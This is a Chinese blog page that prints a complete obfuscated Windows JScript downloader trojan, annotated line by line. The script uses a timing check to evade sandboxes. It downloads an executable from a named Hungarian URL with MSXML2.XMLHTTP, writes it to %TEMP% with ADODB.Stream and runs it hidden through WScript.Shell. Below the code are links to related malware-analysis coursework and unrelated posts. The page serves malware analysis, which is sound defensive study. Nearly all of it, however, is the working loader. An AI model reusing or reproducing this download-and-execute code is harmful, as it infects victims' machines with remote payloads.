//经过样本分析和抓取,该恶意程序是款下载者木马。

//不懂的可以百度百科。

http://baike.baidu.com/link?url=0dNqFM8QIjEQhD71ofElH0wHGktIQ3sMxer47B4z_54LSHixZYLcNWDgisJAeMRN5yJKjMu3znZc_sMh43cuwK

var uKcZJmztw = "f";

var VLjBZijBRDIxir = "sd";

var mzHiDfbVgtzWL = "uhi";

var XrxesgIWQ = "ya";

var STgtocEaUgS = "f";

var Mccq = "gsd";

var YVFRNFKC = "a7o";

var zokYxgifSUOsDIn = "d8f";

var rysGOQRkJ = "hgs";

var fAJEpxv = "7";

var LzK = "u";

var WnKggbYjhbgaYK = "dfa";

var RQJm = "s";

var tcbpCSVm = "o";

var glYioNGTMO = "a";

var cMleB = "fkj";

var guMAPaymgfr = ";l";

var aWosZJAl = "d";

var rrruwakBVMdHT = "s";

var QcfK = "a"; //asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf

//---------------------------------

var wxGM = "f";

var wME = "sd";

var WYl = "hi";

var DgXr = "yau";

var OFbjPAVgdUDSr = "sdf";

var AKaUjBxV = "g";

var YWyNEBKTCAr = "a7o";

var UmkNXPoXKvV = "8f";

var jrUTHQOJCXz = "d";

var VMrAuxWTPKwLZbj = "hgs";

var hnAKwB = "au7";

var kuRwVoQ = "f";

var OXjw = "d";

var wSaGYFaTjPu = "aos";

var UdT = "j";

var wGKytuRmi = "k";

var FwSAu = ";lf";

var uSsmxvh = "d";

var xrUulSuJwZcZEin = "as";//asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf

////---------------------------------

var fvJysePITGsZ = "f";

var MJLm = "sd";

var OHdTWUSWyLDnD = "hi";

var NfkoHHanka = "au";

var pAJLp = "fy";

var xTeQe = "d";

var wolngRcKPNjI = "s";

var Ctd0 = "og";

var NGJpEc = "a7";

var johMrZhTBT = "f";

var rWRr = "d8";

var xhuyvlXNtG = "gs";

var AoFEsd = "7h";

var IarTKEg = "fau";

var UiCusNVVRYpV = "osd";

var SqXtHDCTAOoEfv = "ja";

var kSXJa = "k";

var AzMZQADlr = ";lf";

var OFZC = "sd";

var UFs = "a";//asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf

//-----------------------------------

var wiM = "ose";

var cdzFN = "l";

var gtVOEyZRPMBkY = "c";//close();

//-----------------------------------

var FKqYCuGSVDKEk = "e";

var yLdfoNQSLG = "Fil";

var Kegv = "o";

var REweUeFfsfzCC = "veT";

var mCxYdwKmDTeZ = "Sa";//savetofile();

//-----------------------------------

var orFCagIxftilPY = "on";

var AnB = "iti";

var OeuDh = "pos";//position

//-----------------------------------

var bxwfUYaplk = "e";

var ZHBIenDJhvi = "t";

var OmwNrBIs = "wri";//write()

//-----------------------------------

var IonAXHdnbsJsHYL = "e";

var svvPS = "typ";//type

//-----------------------------------

var RxDykD = "n";

var ftsB = "ope";//open

//-----------------------------------

var zZoO = "am";

var TSCSrKWiKQY = "tre";

var AIfn = "B.S";

var zbAsfUmIk = "D";

var uWdDgxvOZcUG = "O";

var MUSaOvH = "D";

var YZVOwlzLPfausz = "A";//"adodb.stream"

//-----------------------------------

var pNGkr = "ct";

var iqPSquxJgp = "je";

var bTJnufjW = "b";

var lIexL = "teO";

var kZBJ = "rea";

var derqHNng = "C";//creatobject("adodb.stream") 

var LiTxpjAMHxAgUQ = "4h4";

var WWzPWldMX = "6n";

var CuF0 = "k6j";

var oUHbKSEqhF = "0";

var lQP = "hu/";

var RQUOidonsf = "l.";

var NjKvurbzu = "ta";

var CSyCCMfj = "por";

var XcTxpkvH = "egy";

var aUucLqfydBnSn = "j";

var lTXzk = "ev";

var mpAARoVfxvEsej = ".n";

var NVJeSNhziHjX = "www";

var JFDhyk = "://";

var CFpmRSiBsMp = "p";

var rKP = "htt";//http://www.nevjegyportal.hu/ok6j6n4h4

//-----------------------------------

var uBtUfBIHbmz = "T";

var LwKK = "GE";// get

//-----------------------------------

var KRPXN = "pen";

var HrNtkpOuBMYa = "o";//open

//-----------------------------------

var OFdMpJOyw = "e";

var NlpqQU = "x";

var cZpOdxEyvqRfb = "7.e";

var cLfbaiuobq = "PO";

var XmXyEnhbtWhG = "M1";

var DQZEGAm = "ko";

var cKoUGmrGJtE = "SE";

var QasyJ = "Ky";//KySEKoM1PO7.exe

//-----------------------------------

var eQyCEVqQUazI = "%/";

var tNgKCALxxEpJMf = "P";

var mNYqbv = "M";

var FrwlCZOPjcmJvoE = "E";

var KyNfXZkSc = "%T";//%TEMP%/

//-----------------------------------

var AjbjrFWcHO = "gs";

var RyW = "in";

var LVlachWJa = "Str";

var NGjUy = "t";

var ZXMail = "n";

var XLaaPawDhGaz = "e";

var lRTf = "m";

var EGxwfaNKp = "ron";

var UCOpd = "vi";

var xZQvOWiNMG = "n";

var NLgbSPQIDLAIj = "ndE";

var Gyo = "xpa";

var gPYeoLnn = "E";//expendenvironmentstrings

//-----------------------------------

var kpsxpufDRzihIGv = "TP";

var vGOfgZZdOVh = "T";

var wJOAaSUgz = "LH";

var bPhWMdYs = "XM";

var AwpqZN = "2.";

var RNVidTrApbBfHO = "XML";

var ynXoQhqDiQydxVe = "MS";//msxml2.xmlhttp

//-----------------------------------

var zkeMzwunlwoMdUD = "n";

var oVQABSTeJWqKG = "Ru";

var WkRVEzGFpaMCAC = "ell";

var AoJg = "h";

var HDveUfs = "S";

var PGItzPyn = ".";

var iTVqHxcrEbduDt = "t";

var wxGWFQyhW = "rip";

var KDSFP = "c";

var nzV = "WS";//wscript.shell.run()

//-----------------------------------

var NFFhujLOFwsUs = "ct";

var kvZBOvoVgLSEG = "je";

var DXP = "b";

var zjRmzjunjFUys = "O";

var EcDMPFvaxG = "e";

var stMA = "at";

var KnALPhmOVixZ = "Cre";//createobject()

//-----------------------------------

var aCTc = new Date();

var SZT0 = aCTc.getMilliseconds();

WScript.Sleep(10);

var aCTc = new Date();

var bRDtyPAQicD = aCTc.getMilliseconds();

WScript.Sleep(10);

var aCTc = new Date();

var VrU = aCTc.getMilliseconds();

WScript.Sleep(10);

var aCTc = new Date();

var DEyWdL = aCTc.getMilliseconds();

//

var NdNAj = bRDtyPAQicD - SZT0;

//var NdNAj=new Date().getMilliseconds()-new Date().getMilliseconds();

//

//    10s

var HRORMjJ = VrU - bRDtyPAQicD;

//    10s

var YSc0 = DEyWdL - VrU;

//    10s

WshShell = WScript[KnALPhmOVixZ + stMA + EcDMPFvaxG + zjRmzjunjFUys + DXP + kvZBOvoVgLSEG + NFFhujLOFwsUs](nzV + KDSFP + wxGWFQyhW + iTVqHxcrEbduDt + PGItzPyn + HDveUfs + AoJg + WkRVEzGFpaMCAC);

//wshShell=wscript[createobject](wscript.shell.run);

function jmljvNFWjSplH(NLN){WshShell[oVQABSTeJWqKG + zkeMzwunlwoMdUD](NLN, 0, 0);}

//function jmljvNFWjSplH(NLN)

//{

//    WshShell[run](NLN,0,0);

//}

function OcEOsFHpWS(n){return ynXoQhqDiQydxVe + RNVidTrApbBfHO + AwpqZN + bPhWMdYs + wJOAaSUgz + vGOfgZZdOVh + kpsxpufDRzihIGv;}

//function OcEOsFHpWS(n)

//{

//    return MSxml2.xmlhttp;

//}

if ((NdNAj != HRORMjJ) || (HRORMjJ != YSc0)){fOikDMmzwkAuGlw = WshShell[gPYeoLnn + Gyo + NLgbSPQIDLAIj + xZQvOWiNMG + UCOpd + EGxwfaNKp + lRTf + XLaaPawDhGaz + ZXMail + NGjUy + LVlachWJa + RyW + AjbjrFWcHO](KyNfXZkSc + FrwlCZOPjcmJvoE + mNYqbv + tNgKCALxxEpJMf + eQyCEVqQUazI) + QasyJ + cKoUGmrGJtE + DQZEGAm + XmXyEnhbtWhG + cLfbaiuobq + cZpOdxEyvqRfb + NlpqQU + OFdMpJOyw;

//fOikDMmzwkAuGlw=/%temp%/ path

//WshShell[expendedenvironmentstrings](%temp%);

EFASPqJ = OcEOsFHpWS(0);

//var xmlHTTP=new ActiveObject("Microsoft.XMLHTTP");

wMRqfsrlJdPwT = WScript.CreateObject(EFASPqJ);

//

//xmlhttp object

//[HrNtkpOuBMYa + KRPXN]==open        

wMRqfsrlJdPwT[HrNtkpOuBMYa + KRPXN](LwKK + uBtUfBIHbmz, rKP + CFpmRSiBsMp + JFDhyk + NVJeSNhziHjX + mpAARoVfxvEsej + lTXzk + aUucLqfydBnSn + XcTxpkvH + CSyCCMfj + NjKvurbzu + RQUOidonsf + lQP + oUHbKSEqhF + CuF0 + WWzPWldMX + LiTxpjAMHxAgUQ, false);

//wMRqfsrlJdPwT(get,http://www.nevjegyportal.hu/ok6j6n4h4,false);

//xmlhttp.open("get","url",false);

wMRqfsrlJdPwT.send();

while (wMRqfsrlJdPwT.readystate < 4 ) {WScript.Sleep(1000)};

//readystate

elcHu = WScript[KnALPhmOVixZ + stMA + EcDMPFvaxG + zjRmzjunjFUys + DXP + kvZBOvoVgLSEG + NFFhujLOFwsUs](YZVOwlzLPfausz + MUSaOvH + uWdDgxvOZcUG + zbAsfUmIk + AIfn + TSCSrKWiKQY + zZoO);

//var adoStream=createobject("adodb.stream");

elcHu[HrNtkpOuBMYa + KRPXN]();

//adoStream.open();

elcHu[svvPS + IonAXHdnbsJsHYL] = 1;

//adoStream.type=1;

elcHu[OmwNrBIs + ZHBIenDJhvi + bxwfUYaplk](wMRqfsrlJdPwT.ResponseBody);

//adoStream.write(wMRqfsrlJdPwT.ResponseBody);

elcHu[OeuDh + AnB + orFCagIxftilPY] = 0;

//adoStream.position=0;

elcHu[mCxYdwKmDTeZ + REweUeFfsfzCC + Kegv + yLdfoNQSLG + FKqYCuGSVDKEk](fOikDMmzwkAuGlw, 2 );

//adoStream.savetofile(/%temp%/,2);

elcHu[gtVOEyZRPMBkY + cdzFN + wiM]();

//adoStream.close();

//

jmljvNFWjSplH("/%temp%/");

//WshShell[run](NLN,0,0)

NdNAj = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + new Date().getMilliseconds() + new Date().getMilliseconds();;

//10s

HRORMjJ = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + VrU + bRDtyPAQicD;

//new Date().getMilliseconds() - new Date().getMilliseconds()="asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + new Date().getMilliseconds() + new Date().getMilliseconds();

//10s

YSc0 = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + DEyWdL + VrU;

//10s

}

windows本地script脚本恶意代码分析(带注释)的更多相关文章

  1. 2018-2019-2 20165234 《网络对抗技术》 Exp4 恶意代码分析

    实验四 恶意代码分析 实验目的 1.监控自己系统的运行状态,看有没有可疑的程序在运行. 2.分析一个恶意软件,就分析Exp2或Exp3中生成后门软件:分析工具尽量使用原生指令或sysinternals ...

  2. 2018-2019-2 网络对抗技术 20165316 Exp4 恶意代码分析

    2018-2019-2 网络对抗技术 20165316 Exp4 恶意代码分析 一.原理与实践说明 1.实践目标 监控你自己系统的运行状态,看有没有可疑的程序在运行. 分析一个恶意软件,就分析Exp2 ...

  3. 2018-2019-2 20165312《网络攻防技术》Exp4 恶意代码分析

    2018-2019-2 20165312<网络攻防技术>Exp4 恶意代码分析 知识点总结 1.有关schtasks schtacks的作用:安排命令和程序定期运行或在指定时间内运行.从计 ...

  4. Exp4 恶意代码分析 20165110

    Exp4 恶意代码分析 20165110 一.实践目标 1.是监控你自己系统的运行状态,看有没有可疑的程序在运行. 2.是分析一个恶意软件,就分析Exp2或Exp3中生成后门软件:分析工具尽量使用原生 ...

  5. 2018-2019-2 网络对抗技术 20165318 Exp4 恶意代码分析

    2018-2019-2 网络对抗技术 20165318 Exp4 恶意代码分析 原理与实践说明 实践目标 实践内容概述 基础问题回答 实践过程记录 1.使用schtasks指令监控系统 2.使用sys ...

  6. 2018-2019-2 20165330《网络对抗技术》Exp4 恶意代码分析

    目录 基础问题 相关知识 实验目的 实验内容 实验步骤 实验过程中遇到的问题 实验总结与体会 实验目的 监控你自己系统的运行状态,看有没有可疑的程序在运行 分析一个恶意软件,就分析Exp2或Exp3中 ...

  7. 2018-2019-2 20165332 《网络对抗技术》Exp4 恶意代码分析

    2018-2019-2 20165332 <网络对抗技术>Exp4 恶意代码分析 原理与实践说明 1.实践目标 监控你自己系统的运行状态,看有没有可疑的程序在运行. 分析一个恶意软件,就分 ...

  8. 20165223《网络对抗技术》Exp4 恶意代码分析

    目录 -- 恶意代码分析 恶意代码分析说明 实验任务目标 实验内容概述 schtasks命令使用 实验内容 系统运行监控 恶意软件分析 静态分析 virscan分析和VirusTotal分析 PEiD ...

  9. Exp4 恶意代码分析

    一.原理与实践说明 1. 实践目标 1.1 监控你自己系统的运行状态,看有没有可疑的程序在运行. 1.2 分析一个恶意软件,就分析Exp2或Exp3中生成后门软件:分析工具尽量使用原生指令或sysin ...

随机推荐

  1. HDU1232 畅通工程 并查集

    畅通工程 Time Limit: 4000/2000 MS (Java/Others)    Memory Limit: 65536/32768 K (Java/Others)Total Submis ...

  2. Android runtime Exception 整理

    一般面试中java Exception(runtimeException )是必会被问到的问题 常见的异常列出四五种,是基本要求.更多的....需要注意积累了   常见的几种如下:   NullPoi ...

  3. 微信小程序-数据缓存

    每个微信小程序都可以有自己的本地缓存,可以通过 wx.setStorage(wx.setStorageSync).wx.getStorage(wx.getStorageSync).wx.clearSt ...

  4. css3 三角形

    https://jsbin.com/gexezo/edit?html,css,output https://jsbin.com/gexezo

  5. ASP.NET MVC bootstrap 3 ie 8兼容问题及错误解决(取消IE禁用IE脚本调试定位js文件错误)

    因要做一个B/S架构的项目,使用MVC框架技术,本人不擅长页面设计美工,只好用bootstrap框架,在chrome内核系列的浏览器和IE 11中显示都没有问题,但是在 IE 8下显示却不正常,表格无 ...

  6. Ember.js 的视图层

    本指导会详尽阐述 Ember.js 视图层的细节.为想成为熟练 Ember 开发者准备,且包 含了对于入门 Ember 不必要的细节. Ember.js 有一套复杂的用于创建.管理并渲染连接到浏览器 ...

  7. [bzoj1122][POI2008]账本BBB

    1122: [POI2008]账本BBB Time Limit: 10 Sec  Memory Limit: 162 MBSubmit: 402  Solved: 202[Submit][Status ...

  8. checkbox选中 和是否选中

    <input type="checkbox" <%--value="1"--%> id="checkboxOneInput" ...

  9. ORACLE迁移votedisk,spfile以及OCRfile的方法

    在安装GUI时,创建了第一块ASM磁盘,命名为DATA1,上面存放了spfile文件,ocrfile文件,并且作为了vote盘.感觉名字和实际不符,容易搞混,所以想删除这个磁盘,直接删除会报错: OR ...

  10. Caché数据库学习笔记(5)

    目录 Cache数据库方法的RESTful封装 ================================================================ 因为对web serv ...